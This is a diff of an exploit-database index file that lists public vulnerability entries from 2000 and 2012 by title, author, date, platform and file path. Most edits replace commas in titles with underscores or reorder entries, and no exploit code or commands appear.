19817,platforms/ultrix/dos/19817.txt,"Data General DG/UX 5.4 inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",ultrix,dos,0 -19818,platforms/linux/local/19818.c,"Linux kernel 2.2.12/2.2.14/2.3.99,RedHat 6.x Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,local,0 +19818,platforms/linux/local/19818.c,"Linux kernel 2.2.12/2.2.14/2.3.99_RedHat 6.x Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,local,0 19819,platforms/windows/remote/19819.txt,"GeoCel WindMail 3.0 - Remote File Read Vulnerability",2000-03-27,"Quan Peng",windows,remote,0 19820,platforms/windows/remote/19820.txt,"AnalogX SimpleServer:WWW 1.0.3 DoS Vulnerability",2000-03-25,"Presto Chango",windows,remote,0 19821,platforms/multiple/local/19821.c,"Citrix MetaFrame 1.0/1.8 - Weak Encryption Vulnerability",2000-03-29,"Dug Song",multiple,local,0 @@ -17147,10 +17182,11 @@ id,file,description,date,author,platform,type,port 19823,platforms/unix/local/19823.txt,"Standard & Poors ComStock 4.2.4 Machine Vulnerabilities",2000-03-24,kadokev,unix,local,0 19824,platforms/multiple/remote/19824.txt,"Microsoft IIS 4.0 UNC Mapped Virtual Host Vulnerability",2000-03-30,"Adam Coyne",multiple,remote,0 19825,platforms/php/webapps/19825.php,"Shopware 3.5 - SQL Injection",2012-07-14,Kataklysmos,php,webapps,0 +19964,platforms/php/webapps/19964.txt,"PHP-Nuke module(SPChat) SQL Injection Vulnerability",2012-07-20,"Yakir Wizman",php,webapps,0 19827,platforms/windows/dos/19827.txt,"NT 4.0 / Windows 2000 TCP/IP Printing Service DoS Vulnerability",2000-03-30,"Ussr Labs",windows,dos,0 +19963,platforms/windows/dos/19963.txt,"PHP 6.0 openssl_verify() Local Buffer Overflow PoC",2012-07-20,"Yakir Wizman",windows,dos,0 19828,platforms/multiple/remote/19828.txt,"Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability",2000-03-31,"Paul Schreiber",multiple,remote,0 19829,platforms/php/webapps/19829.txt,"Joomla OS Property 2.0.2 Unrestricted File Upload",2012-07-14,D4NB4R,php,webapps,0 -19830,platforms/windows/remote/19830.txt,"Microsoft Index Server 2.0 - '%20' ASP Source Disclosure Vulnerability",2000-03-31,"David Litchfield",windows,remote,0 19831,platforms/hardware/remote/19831.rb,"Siemens Simatic S7-300/400 CPU START/STOP Module",2012-07-14,"Dillon Beresford",hardware,remote,102 19832,platforms/hardware/remote/19832.rb,"Siemens Simatic S7-300 PLC Remote Memory Viewer",2012-07-14,"Dillon Beresford",hardware,remote,8080 19833,platforms/hardware/remote/19833.rb,"Siemens Simatic S7-1200 CPU START/STOP Module",2012-07-14,"Dillon Beresford",hardware,remote,0 @@ -17165,8 +17201,8 @@ id,file,description,date,author,platform,type,port 19842,platforms/cgi/remote/19842.txt,"TalentSoft Web+ 4.x - Directory Traversal Vulnerability",2000-04-12,"John P. McNeely",cgi,remote,0 19843,platforms/windows/dos/19843.java,"AVM KEN! 1.3.10/1.4.30 Malformed Request Remote DoS",2000-04-12,eAX,windows,dos,0 19844,platforms/cgi/remote/19844.txt,"CNC Technology BizDB 1.0 bizdb-search.cgi Remote Command Execution Vulnerability",2000-04-13,"PErfecto Technology",cgi,remote,0 -19845,platforms/windows/remote/19845.pl,"Microsoft FrontPage 98 Server Extensions for IIS,Microsoft InterDev 1.0 Filename Obfuscation",2000-04-14,"rain forest puppy",windows,remote,0 -19846,platforms/windows/remote/19846.pl,"Microsoft FrontPage 98 Server Extensions for IIS,Microsoft InterDev 1.0 - Buffer Overflow Vulnerability",2000-04-14,"Richie & Beto",windows,remote,0 +19845,platforms/windows/remote/19845.pl,"Microsoft FrontPage 98 Server Extensions for IIS_Microsoft InterDev 1.0 Filename Obfuscation",2000-04-14,"rain forest puppy",windows,remote,0 +19846,platforms/windows/remote/19846.pl,"Microsoft FrontPage 98 Server Extensions for IIS_Microsoft InterDev 1.0 - Buffer Overflow Vulnerability",2000-04-14,"Richie & Beto",windows,remote,0 19847,platforms/unix/remote/19847.c,"UoW imapd 10.234/12.264 - Buffer Overflow Vulnerabilities",2002-08-01,"Gabriel A. Maggiotti",unix,remote,0 19848,platforms/unix/remote/19848.pm,"UoW imapd 10.234/12.264 LSUB Buffer Overflow (meta)",2000-04-16,vlad902,unix,remote,0 19849,platforms/unix/remote/19849.pm,"UoW imapd 10.234/12.264 COPY Buffer Overflow (meta)",2000-04-16,vlad902,unix,remote,0 @@ -17176,9 +17212,12 @@ id,file,description,date,author,platform,type,port 19853,platforms/windows/dos/19853.txt,"FrontPage 97/98 Server Image Mapper Buffer Overflow",2000-04-19,Narrow,windows,dos,0 19854,platforms/netware/dos/19854.sh,"Novell Netware 5.1 - Remote Administration Buffer Overflow Vulnerability",2000-04-19,"Michal Zalewski",netware,dos,0 19855,platforms/windows/local/19855.txt,"Panda Security 3.0 - Multiple Vulnerabilities",2000-04-17,Zan,windows,local,0 -19856,platforms/windows/dos/19856.txt,"GameHouse dldisplay ActiveX control 0,Real Server 7.0 Port 7070 DoS",2000-04-20,"Ussr Labs",windows,dos,7070 +19856,platforms/windows/dos/19856.txt,"GameHouse dldisplay ActiveX control 0_Real Server 7.0 Port 7070 DoS",2000-04-20,"Ussr Labs",windows,dos,7070 19857,platforms/windows/remote/19857.rb,"ALLMediaServer 0.8 - Buffer Overflow",2012-07-16,metasploit,windows,remote,888 +19905,platforms/unix/remote/19905.pl,"John Donoghue Knapster 0.9/1.3.8 File Access Vulnerability",2000-05-13,no_maam,unix,remote,0 +19904,platforms/unix/local/19904.txt,"Intel Corporation NetStructure 7110 Undocumented Password Vulnerability",2000-05-08,"Stake Inc",unix,local,0 19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0 +19960,platforms/windows/dos/19960.txt,"Oracle Outside-In FPX File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos,0 19862,platforms/php/webapps/19862.pl,"Wordpress Diary/Notebook Site5 Theme Email Spoofing",2012-07-16,bwall,php,webapps,0 19863,platforms/php/webapps/19863.txt,"CakePHP 2.x-2.2.0-RC2 XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0 19864,platforms/php/webapps/19864.txt,"VamCart 0.9 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 @@ -17186,7 +17225,7 @@ id,file,description,date,author,platform,type,port 19866,platforms/windows/dos/19866.pl,"DomsHttpd <= 1.0 - Remote Denial of Service Exploit",2012-07-16,"Jean Pascal Pereira",windows,dos,0 19867,platforms/linux/local/19867.txt,"S.u.S.E. Linux 6.x - Arbitrary File Deletion Vulnerability",2000-04-21,Peter_M,linux,local,0 19868,platforms/linux/remote/19868.c,"LCDProc 0.4 - Buffer Overflow Vulnerability",2000-04-23,"Andrew Hobgood",linux,remote,0 -19869,platforms/linux/dos/19869.txt,"Qualcomm qpopper 2.53/3.0,RedHat imap 4.5 -4,UoW imap 4.5 popd Lock File DoS",2000-04-19,"Alex Mottram",linux,dos,0 +19869,platforms/linux/dos/19869.txt,"Qualcomm qpopper 2.53/3.0_RedHat imap 4.5 -4_UoW imap 4.5 popd Lock File DoS",2000-04-19,"Alex Mottram",linux,dos,0 19870,platforms/linux/local/19870.pl,"CVS 1.10.7 - Local Denial of Service Vulnerability",2000-04-23,"Michal Szymanski",linux,local,0 19871,platforms/windows/remote/19871.txt,"Zone Labs ZoneAlarm 2.1 Personal Firewall Port 67 Vulnerability",2000-04-24,"Wally Whacker",windows,remote,0 19872,platforms/solaris/local/19872.c,"Solaris 2.6/7.0 lpset -r Buffer Overflow Vulnerability (1)",2000-04-24,DiGiT,solaris,local,0 @@ -17194,7 +17233,7 @@ id,file,description,date,author,platform,type,port 19874,platforms/solaris/local/19874.c,"Solaris 2.6/7.0 lpset -r Buffer Overflow Vulnerability (3)",2000-04-24,"Theodor Ragnar Gislason",solaris,local,0 19875,platforms/immunix/local/19875.txt,"PostgreSQL 6.3.2/6.5.3 Cleartext Passwords Vulnerability",2000-04-23,"Robert van der Meulen",immunix,local,0 19876,platforms/solaris/local/19876.c,"Solaris 7.0/8 Xsun Buffer Overrun Vulnerability",2000-04-24,DiGiT,solaris,local,0 -19877,platforms/windows/remote/19877.txt,"FrontPage 98/Personal WebServer 1.0,Personal Web Server 2.0 htimage.exe File Existence Disclosure",2000-04-19,Narrow,windows,remote,0 +19877,platforms/windows/remote/19877.txt,"FrontPage 98/Personal WebServer 1.0_Personal Web Server 2.0 htimage.exe File Existence Disclosure",2000-04-19,Narrow,windows,remote,0 19878,platforms/solaris/local/19878.c,"Solaris 2.6/7.0 lp -d Option Buffer Overflow Vulnerability",2000-04-24,DiGiT,solaris,local,0 19879,platforms/linux/remote/19879.txt,"RedHat 6.2 Piranha Virtual Server Package Default Account and Password Vulnerability",2000-04-24,"Max Vision",linux,remote,0 19880,platforms/windows/dos/19880.txt,"Symantec pcAnywhere 8.0.1/8.0.2/9.0/9.2 Port Scan DoS Vulnerability",2000-04-25,Vacuum,windows,dos,0 @@ -17206,22 +17245,19 @@ id,file,description,date,author,platform,type,port 19886,platforms/multiple/remote/19886.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (1)",2000-05-02,FuSyS,multiple,remote,0 19887,platforms/multiple/remote/19887.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (2)",2000-05-02,MaXX,multiple,remote,0 19888,platforms/multiple/remote/19888.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (3)",2002-01-18,g463,multiple,remote,0 -19889,platforms/windows/remote/19889.c,"Microsoft Windows 95/98 - NetBIOS NULL Name Vulnerability",2000-05-02,"rain forest puppy",windows,remote,0 19890,platforms/cgi/remote/19890.txt,"ultrascripts ultraboard 1.6 - Directory Traversal Vulnerability",2000-05-03,"Rudi Carell",cgi,remote,0 -19891,platforms/linux/remote/19891.c,"Ethereal 0.8.4/0.8.5/0.8.6,tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (1)",1999-05-31,"Hugo Breton",linux,remote,0 -19892,platforms/linux/remote/19892.txt,"Ethereal 0.8.4/0.8.5/0.8.6,tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (2)",1999-05-31,scut,linux,remote,0 +19891,platforms/linux/remote/19891.c,"Ethereal 0.8.4/0.8.5/0.8.6_tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (1)",1999-05-31,"Hugo Breton",linux,remote,0 +19892,platforms/linux/remote/19892.txt,"Ethereal 0.8.4/0.8.5/0.8.6_tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (2)",1999-05-31,scut,linux,remote,0 19893,platforms/windows/remote/19893.c,"L-Soft Listserv 1.8 Web Archives Buffer Overflow Vulnerability",2000-05-01,"David Litchfield",windows,remote,0 19894,platforms/windows/local/19894.txt,"Aladdin Knowledge Systems eToken 3.3.3 eToken PIN Extraction Vulnerability",2000-05-04,kingpin,windows,local,0 19895,platforms/windows/remote/19895.txt,"NetWin DNews 5.3 Server Buffer Overflow Vulnerability",2000-03-01,Joey__,windows,remote,0 -19896,platforms/bsd/dos/19896.c,"FreeBSD 3.4/4.0/5.0,NetBSD 1.4 Unaligned IP Option Denial of Service",2000-05-04,y3t1,bsd,dos,0 -19897,platforms/windows/remote/19897.txt,"FrontPage 2000,IIS 4.0/5.0 Server Extensions Path Disclosure Vulnerability",2000-05-06,"Frankie Zie",windows,remote,0 +19896,platforms/bsd/dos/19896.c,"FreeBSD 3.4/4.0/5.0_NetBSD 1.4 Unaligned IP Option Denial of Service",2000-05-04,y3t1,bsd,dos,0 +19897,platforms/windows/remote/19897.txt,"FrontPage 2000_IIS 4.0/5.0 Server Extensions Path Disclosure Vulnerability",2000-05-06,"Frankie Zie",windows,remote,0 19898,platforms/php/webapps/19898.txt,"Forum Oxalis <= 0.1.2 - SQL Injection Vulnerability",2012-07-17,"Jean Pascal Pereira",php,webapps,0 19899,platforms/cgi/dos/19899.txt,"UltraBoard 1.6 DoS Vulnerability",2000-05-05,"Juan M. Bello Rivas",cgi,dos,0 19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 pam_console Vulnerability",2000-05-03,"Michal Zalewski",linux,local,0 19901,platforms/hardware/remote/19901.txt,"Netopia R-series routers 4.6.2 Vulnerability",2000-05-16,"Stephen Friedl",hardware,remote,0 -19903,platforms/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 DBMan Information Leakage Vulnerability",2000-05-05,"Black Watch Labs",multiple,remote,0 -19904,platforms/unix/local/19904.txt,"Intel Corporation NetStructure 7110 Undocumented Password Vulnerability",2000-05-08,"Stake Inc",unix,local,0 -19905,platforms/unix/remote/19905.pl,"John Donoghue Knapster 0.9/1.3.8 File Access Vulnerability",2000-05-13,no_maam,unix,remote,0 +20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 (products_map.php symb parameter) XSS Vulnerability",2012-07-21,muts,php,webapps,0 19906,platforms/multiple/remote/19906.txt,"Matt Wright FormMail 1.6/1.7/1.8 Environmental Variables Disclosure Vulnerability",2000-05-10,"Black Watch Labs",multiple,remote,0 19907,platforms/windows/dos/19907.txt,"Microsoft IIS 4.0/5.0 Malformed File Extension DoS Vulnerability",2000-05-11,"Ussr Labs",windows,dos,0 19908,platforms/windows/remote/19908.txt,"Microsoft IIS 4.0/5.0 Malformed Filename Request Vulnerability",2000-05-11,"Cerberus Security Team",windows,remote,0 @@ -17240,11 +17276,13 @@ id,file,description,date,author,platform,type,port 19921,platforms/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 - Arbitrary Command Execution",2000-05-16,suid,cgi,remote,0 19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 Default Username and Password",2000-05-17,"rain forest puppy",windows,remote,0 19923,platforms/hardware/remote/19923.txt,"Cayman 3220-H DSL Router 1.0/GatorSurf 5.3 DoS Vulnerability",2000-05-17,cassius,hardware,remote,0 -19924,platforms/bsd/remote/19924.c,"Cygnus Network Security 4.0/KerbNet 5.0,MIT Kerberos 4/5,RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (1)",2000-05-16,duke,bsd,remote,0 -19925,platforms/linux/local/19925.c,"Cygnus Network Security 4.0/KerbNet 5.0,MIT Kerberos 4/5,RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (2)",2000-05-26,"Jim Paris",linux,local,0 -19926,platforms/linux/remote/19926.c,"Cygnus Network Security 4.0/KerbNet 5.0,MIT Kerberos 4/5,RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (3)",2000-04-08,"Jim Paris",linux,remote,0 +19924,platforms/bsd/remote/19924.c,"Cygnus Network Security 4.0/KerbNet 5.0_MIT Kerberos 4/5_RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (1)",2000-05-16,duke,bsd,remote,0 +19925,platforms/linux/local/19925.c,"Cygnus Network Security 4.0/KerbNet 5.0_MIT Kerberos 4/5_RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (2)",2000-05-26,"Jim Paris",linux,local,0 +19926,platforms/linux/remote/19926.c,"Cygnus Network Security 4.0/KerbNet 5.0_MIT Kerberos 4/5_RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (3)",2000-04-08,"Jim Paris",linux,remote,0 19927,platforms/php/webapps/19927.html,"Nwahy Articles 2.2 - CSRF Add Admin",2012-07-18,DaOne,php,webapps,0 19928,platforms/windows/remote/19928.txt,"Microsoft Active Movie Control 1.0 Filetype Vulnerability",2000-05-13,http-equiv,windows,remote,0 +19965,platforms/multiple/remote/19965.txt,"HP JetAdmin 6.0 Printing DoS Vulnerability",2000-05-24,"Ussr Labs",multiple,remote,0 +19966,platforms/linux/remote/19966.c,"Marty Bochane MDBms 0.9 xbx Buffer Overflow Vulnerability",2000-05-24,"HaCk-13 TeaM",linux,remote,0 19930,platforms/windows/local/19930.rb,"Windows Escalate Task Scheduler XML Privilege Escalation",2012-07-19,metasploit,windows,local,0 19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 -Buffer Overflow",2012-07-19,metasploit,windows,remote,998 19932,platforms/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 - Buffer Overflow",2012-07-19,metasploit,windows,remote,998 @@ -17256,29 +17294,24 @@ id,file,description,date,author,platform,type,port 19941,platforms/windows/dos/19941.casl,"Axent NetProwler 3.0 Malformed IP Packets DoS Vulnerability (2)",2000-05-18,"Pedro Quintanilha",windows,dos,0 19942,platforms/windows/remote/19942.txt,"Fortech Proxy+ 2.30 - Remote Administration Vulnerability",1999-12-26,anonymous,windows,remote,0 19943,platforms/hardware/remote/19943.txt,"Intel Corporation Express 8100 ISDN Router Fragmented ICMP Vulnerability",1990-05-19,"Dimuthu Parussalla",hardware,remote,0 -19944,platforms/multiple/remote/19944.pl,"Lotus Domino Enterprise Server 5.0.1/5.0.2/5.0.3,Mail Server 5.0.1/5.0.2/5.0.3 - Buffer Overflow",2000-05-18,smiler,multiple,remote,0 +19944,platforms/multiple/remote/19944.pl,"Lotus Domino Enterprise Server 5.0.1/5.0.2/5.0.3_Mail Server 5.0.1/5.0.2/5.0.3 - Buffer Overflow",2000-05-18,smiler,multiple,remote,0 19945,platforms/multiple/remote/19945.txt,"MetaProducts Offline Explorer 1.0 x/1.1 x/1.2 x - Directory Traversal",2000-05-19,Wyzewun,multiple,remote,0 19946,platforms/linux/local/19946.txt,"OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 /usr/tmp/ Symlink Vulnerability",2000-04-21,anonymous,linux,local,0 19947,platforms/linux/remote/19947.c,"gdm 1.0.x/2.0.x BETA/2.2.0 - XDMCP Buffer Overflow Vulnerability (1)",2000-05-22,"Chris Evans",linux,remote,0 19948,platforms/linux/remote/19948.c,"gdm 1.0.x/2.0.x BETA/2.2.0 - XDMCP Buffer Overflow Vulnerability (2)",2000-05-22,AbraxaS,linux,remote,0 -19949,platforms/irix/remote/19949.c,"Gauntlet Firewall 4.1/4.2/5.0,WebShield E-ppliance 100.0/300.0,IRIX 6.5.x - Remote Buffer Overflow",2000-05-18,_Gramble_,irix,remote,0 +19949,platforms/irix/remote/19949.c,"Gauntlet Firewall 4.1/4.2/5.0_WebShield E-ppliance 100.0/300.0_IRIX 6.5.x - Remote Buffer Overflow",2000-05-18,_Gramble_,irix,remote,0 19950,platforms/linux/dos/19950.c,"XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver Denial of Service Vulnerability",2000-05-18,"Chris Evans",linux,dos,0 -19951,platforms/cgi/remote/19951.php,"QuickCommerce 2.5/3.0,Cart32 2.5 a/3.0,Shop Express 1.0,StoreCreator 3.0 Web Shopping Cart Hidden Form Field Vulnerability",2000-02-01,CDI,cgi,remote,0 -19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0,Slackware 3.x/4.0,Turbolinux 6,OpenLinux 7.0 fdmount Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0 -19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0,Slackware 3.x/4.0,Turbolinux 6,OpenLinux 7.0 fdmount Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0 -19954,platforms/linux/local/19954.c,"S.u.S.E. 4.x/5.x/6.x/7.0,Slackware 3.x/4.0,Turbolinux 6,OpenLinux 7.0 fdmount Buffer Overflow (3)",2000-05-22,WaR,linux,local,0 -19955,platforms/linux/local/19955.c,"Cobalt RaQ 2.0/3.0,qpopper 2.52/2.53 - 'EUIDL' Format String Input Vulnerability",2000-05-24,Prizm,linux,local,0 +19951,platforms/cgi/remote/19951.php,"QuickCommerce 2.5/3.0_Cart32 2.5 a/3.0_Shop Express 1.0_StoreCreator 3.0 Web Shopping Cart Hidden Form Field Vulnerability",2000-02-01,CDI,cgi,remote,0 +19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0 +19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0 +19954,platforms/linux/local/19954.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (3)",2000-05-22,WaR,linux,local,0 +19955,platforms/linux/local/19955.c,"Cobalt RaQ 2.0/3.0_qpopper 2.52/2.53 - 'EUIDL' Format String Input Vulnerability",2000-05-24,Prizm,linux,local,0 19956,platforms/cgi/remote/19956.txt,"hp jetadmin 5.5.177/jetadmin 5.6 - Directory Traversal Vulnerability",2000-05-24,"Ussr Labs",cgi,remote,8000 19957,platforms/windows/remote/19957.txt,"Pacific Software Carello 1.2.1 File Duplication and Source Disclosure Vulnerability",2000-05-24,"Cerberus Security Team",windows,remote,0 19958,platforms/windows/remote/19958.rb,"Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow",2012-07-20,metasploit,windows,remote,0 19959,platforms/windows/remote/19959.rb,"Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow",2012-07-20,metasploit,windows,remote,998 -19960,platforms/windows/dos/19960.txt,"Oracle Outside-In FPX File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos,0 19961,platforms/windows/dos/19961.txt,"Oracle Outside-In LWP File Parsing Stack Based Buffer Overflow",2012-07-20,"Francis Provencher",windows,dos,0 19962,platforms/windows/dos/19962.txt,"Oracle Outside-In JP2 File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos,0 -19963,platforms/windows/dos/19963.txt,"PHP 6.0 openssl_verify() Local Buffer Overflow PoC",2012-07-20,"Yakir Wizman",windows,dos,0 -19964,platforms/php/webapps/19964.txt,"PHP-Nuke module(SPChat) SQL Injection Vulnerability",2012-07-20,"Yakir Wizman",php,webapps,0 -19965,platforms/multiple/remote/19965.txt,"HP JetAdmin 6.0 Printing DoS Vulnerability",2000-05-24,"Ussr Labs",multiple,remote,0 -19966,platforms/linux/remote/19966.c,"Marty Bochane MDBms 0.9 xbx Buffer Overflow Vulnerability",2000-05-24,"HaCk-13 TeaM",linux,remote,0 19967,platforms/multiple/local/19967.txt,"Omnis Studio 2.4 Weak Database Field Encryption Vulnerability",2000-05-25,Eric.Stevens,multiple,local,0 19968,platforms/windows/local/19968.c,"Windows 2000/95/98/NT 4.0 Long Filename Extension Vulnerability",2000-04-21,"Laurent Eschenauer",windows,local,0 19969,platforms/linux/local/19969.c,"Mandriva Linux Mandrake 7.0 - Buffer Overflow Vulnerability",2000-05-29,noir,linux,local,0 @@ -17294,9 +17327,9 @@ id,file,description,date,author,platform,type,port 19979,platforms/linux/local/19979.pl,"KDE 1.1.2 KApplication configfile Vulnerability (1)",2000-05-31,kil3r,linux,local,0 19980,platforms/linux/local/19980.pl,"KDE 1.1.2 KApplication configfile Vulnerability (2)",2000-05-31,kil3r,linux,local,0 19981,platforms/linux/local/19981.sh,"KDE 1.1.2 KApplication configfile Vulnerability (3)",2000-05-31,IhaQueR,linux,local,0 -19982,platforms/bsd/dos/19982.c,"FreeBSD 3.x/4.0/5.0,NetBSD 1.4.1/1.4.2,OpenBSD 2.x - Denial of Service",2000-06-01,"Ussr Labs",bsd,dos,0 +19982,platforms/bsd/dos/19982.c,"FreeBSD 3.x/4.0/5.0_NetBSD 1.4.1/1.4.2_OpenBSD 2.x - Denial of Service",2000-06-01,"Ussr Labs",bsd,dos,0 19983,platforms/linux/remote/19983.c,"NetWin DMail 2.7/2.8 ETRN Buffer Overflow Vulnerability",2000-06-01,noir,linux,remote,0 -19984,platforms/multiple/dos/19984.c,"Eterm 0.8.10,rxvt 2.6.1,PuTTY 0.48,X11R6 3.3.3/4.0 - Denial of Service",2000-05-31,"Kit Knox",multiple,dos,0 +19984,platforms/multiple/dos/19984.c,"Eterm 0.8.10_rxvt 2.6.1_PuTTY 0.48_X11R6 3.3.3/4.0 - Denial of Service",2000-05-31,"Kit Knox",multiple,dos,0 19985,platforms/php/webapps/19985.txt,"NetArt Media iBoutique 4.0 (index.php key parameter) SQL Injection Vulnerability",2012-07-20,"SecPod Research",php,webapps,0 19986,platforms/windows/dos/19986.txt,"Oxide Webserver 2.0.4 - Denial of Service Vulnerability",2012-07-20,"SecPod Research",windows,dos,0 19987,platforms/linux/dos/19987.py,"ptunnel <= 0.72 - Remote Denial of Service",2012-07-20,st3n,linux,dos,0 @@ -17312,8 +17345,8 @@ id,file,description,date,author,platform,type,port 19997,platforms/windows/remote/19997.java,"Etype Eserv 2.9.2 Logging Buffer Overflow Vulnerability",2000-05-10,Wizdumb,windows,remote,0 19998,platforms/linux/remote/19998.c,"ISC innd 2.x - Remote Buffer Overflow Vulnerability",2000-06-12,"Michal Zalewski",linux,remote,0 19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 BRUEXECLOG Environment Variable Vulnerability",2000-06-05,"Riley Hassell",multiple,local,0 -20000,platforms/linux/local/20000.c,"kernel 2.2.x/2.4 .0-test1,SGI ProPack 1.2/1.3 - Capabilities Vulnerability (1)",2000-06-07,"Florian Heinz",linux,local,0 -20001,platforms/linux/local/20001.sh,"kernel 2.2.x/2.4 .0-test1,SGI ProPack 1.2/1.3 - Capabilities Vulnerability (2)",2000-06-07,"Wojciech Purczynski",linux,local,0 +20000,platforms/linux/local/20000.c,"kernel 2.2.x/2.4 .0-test1_SGI ProPack 1.2/1.3 - Capabilities Vulnerability (1)",2000-06-07,"Florian Heinz",linux,local,0 +20001,platforms/linux/local/20001.sh,"kernel 2.2.x/2.4 .0-test1_SGI ProPack 1.2/1.3 - Capabilities Vulnerability (2)",2000-06-07,"Wojciech Purczynski",linux,local,0 20002,platforms/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 SNMPD File Permission Vulnerabilities",2000-06-07,loveyou,hp-ux,local,0 20003,platforms/solaris/local/20003.txt,"Intel Corporation Shiva Access Manager 5.0 Solaris World Readable LDAP Password",2000-06-06,"Blaise St. Laurent",solaris,local,0 20004,platforms/linux/local/20004.c,"Stelian Pop dump 0.4 restore Buffer Overflow Vulnerability",2000-06-07,"Stan Bubrouski",linux,local,0 @@ -17322,7 +17355,6 @@ id,file,description,date,author,platform,type,port 20007,platforms/cgi/remote/20007.c,"3R Soft MailStudio 2000 2.0 userreg.cgi Arbitrary Command Execution",2000-04-24,fygrave,cgi,remote,0 20008,platforms/cgi/remote/20008.txt,"3R Soft MailStudio 2000 2.0 - Arbitrary File Access",2000-06-09,s0ftpr0ject,cgi,remote,0 20009,platforms/linux/remote/20009.py,"atmail email server appliance 6.4 - Stored XSS - CSRF - rce",2012-07-21,muts,linux,remote,0 -20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 (products_map.php symb parameter) XSS Vulnerability",2012-07-21,muts,php,webapps,0 20011,platforms/windows/webapps/20011.js,"solarwinds orion network performance monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0 20012,platforms/windows/local/20012.txt,"Computer Associates eTrust Intrusion Detection 1.4.1.13 - Weak Encryption Vulnerability",2000-06-07,Phate.net,windows,local,0 20013,platforms/linux/local/20013.c,"Sam Lantinga splitvt 1.6.3 - Buffer Overflow Vulnerability",2000-06-01,Syzop,linux,local,0 @@ -17335,9 +17367,9 @@ id,file,description,date,author,platform,type,port 20020,platforms/windows/dos/20020.txt,"Alt-N MDaemon 2.8.5 - UIDL DoS Vulnerability",2000-06-16,Craig,windows,dos,0 20021,platforms/linux/local/20021.txt,"RedHat 6.2 Piranha Virtual Server Package Plaintext Password Vulnerability",2000-06-09,arkth,linux,local,0 20022,platforms/windows/local/20022.txt,"HM Software S to Infinity 3.0 - Multiple Vulnerabilities",2000-06-15,Synapt1c,windows,local,0 -20023,platforms/linux/dos/20023.c,"Gnome 1.0/1.1,Group X 11.0,XFree86 X11R6 3.3.x/4.0 - Denial of Service",2000-06-19,"Chris Evans",linux,dos,0 -20024,platforms/linux/local/20024.c,"Mandrake 7.0/7.1,RedHat Kon2 0.3.9 fld Input File Overflow",2000-08-01,E-Ligth,linux,local,0 -20025,platforms/linux/dos/20025.txt,"Debian 2.1/2.2,Mandrake 6.0/6.1/7.0,RedHat 6.x rpc.lockd Remote Denial of Service",2000-06-08,"Mike Murray",linux,dos,0 +20023,platforms/linux/dos/20023.c,"Gnome 1.0/1.1_Group X 11.0_XFree86 X11R6 3.3.x/4.0 - Denial of Service",2000-06-19,"Chris Evans",linux,dos,0 +20024,platforms/linux/local/20024.c,"Mandrake 7.0/7.1_RedHat Kon2 0.3.9 fld Input File Overflow",2000-08-01,E-Ligth,linux,local,0 +20025,platforms/linux/dos/20025.txt,"Debian 2.1/2.2_Mandrake 6.0/6.1/7.0_RedHat 6.x rpc.lockd Remote Denial of Service",2000-06-08,"Mike Murray",linux,dos,0 20026,platforms/linux/dos/20026.c,"OpenLinux 2.3/2.4 / RedHat 6.0/6.1 / SCO eServer 2.3 - Denial of Service",1999-11-23,FuckGpm,linux,dos,0 20027,platforms/multiple/remote/20027.txt,"BEA Systems WebLogic Express 3.1.8/4/5 Source Code Disclosure",2000-06-21,"Foundstone Inc.",multiple,remote,0 20028,platforms/windows/remote/20028.rb,"Simple Web Server Connection Header Buffer Overflow",2012-07-23,metasploit,windows,remote,0 @@ -17358,8 +17390,8 @@ 